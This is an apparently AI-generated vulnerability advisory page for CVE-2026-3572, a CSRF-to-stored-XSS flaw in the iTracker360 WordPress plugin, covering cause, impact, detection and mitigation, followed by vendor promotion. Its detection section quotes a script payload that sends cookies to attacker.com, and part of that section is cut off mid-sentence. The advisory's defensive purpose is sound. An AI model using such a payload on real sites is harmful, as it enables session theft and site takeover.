
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3572 is a Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) vulnerability in the iTracker360 plugin for WordPress. It affects all versions of the plugin up to and including 2.2.0. The vulnerability was published on March 21, 2026, and was assigned by Wordfence. It carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, EUVD).
The root cause is twofold: missing nonce verification on the plugin's settings form submission (CWE-352: CSRF) combined with insufficient input sanitization and missing output escaping (CWE-79: Stored XSS). An unauthenticated attacker can craft a malicious HTTP request targeting the settings form handler — specifically around lines 115–116 and 187 of itracker360.php — and trick an authenticated administrator into submitting it (e.g., by clicking a crafted link). Because no nonce is validated, the forged request is accepted, and the unsanitized input is stored and later rendered without escaping, resulting in persistent script execution in the victim's browser (Wordfence, WordPress Trac).
Successful exploitation allows an attacker to persistently inject arbitrary JavaScript into WordPress admin pages, which executes in the context of any administrator or user who views the affected page. This can lead to session token theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts), and potential full site compromise. Confidentiality and integrity are both impacted at a low-to-moderate level, while availability is not directly affected (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-3572 as of the available data. The EPSS score is approximately 0.078%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering to trick an administrator into clicking a malicious link, which raises the bar compared to fully unauthenticated attacks (Wordfence).
itracker360.php lines 115–116/187) with a malicious JavaScript payload in a settings field (e.g., <script>document.location='https://attacker.com/?c='+document.cookie</script>).wp_options table) containing JavaScript tags or encoded script content associated with iTracker360 plugin settings.Users should update the iTracker360 plugin to a version beyond 2.2.0 that includes nonce verification and proper input sanitization/output escaping. If no patched version is yet available, the recommended workaround is to deactivate and remove the plugin until a fix is released. Site administrators should also review their WordPress plugin settings for any unexpected or malicious stored values and audit recent admin activity logs (Wordfence).
The vulnerability was disclosed by Wordfence, a leading WordPress security firm, as part of their standard threat intelligence reporting. No notable independent researcher commentary, significant social media discussion, or major media coverage has been identified for this CVE beyond standard aggregator listings (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."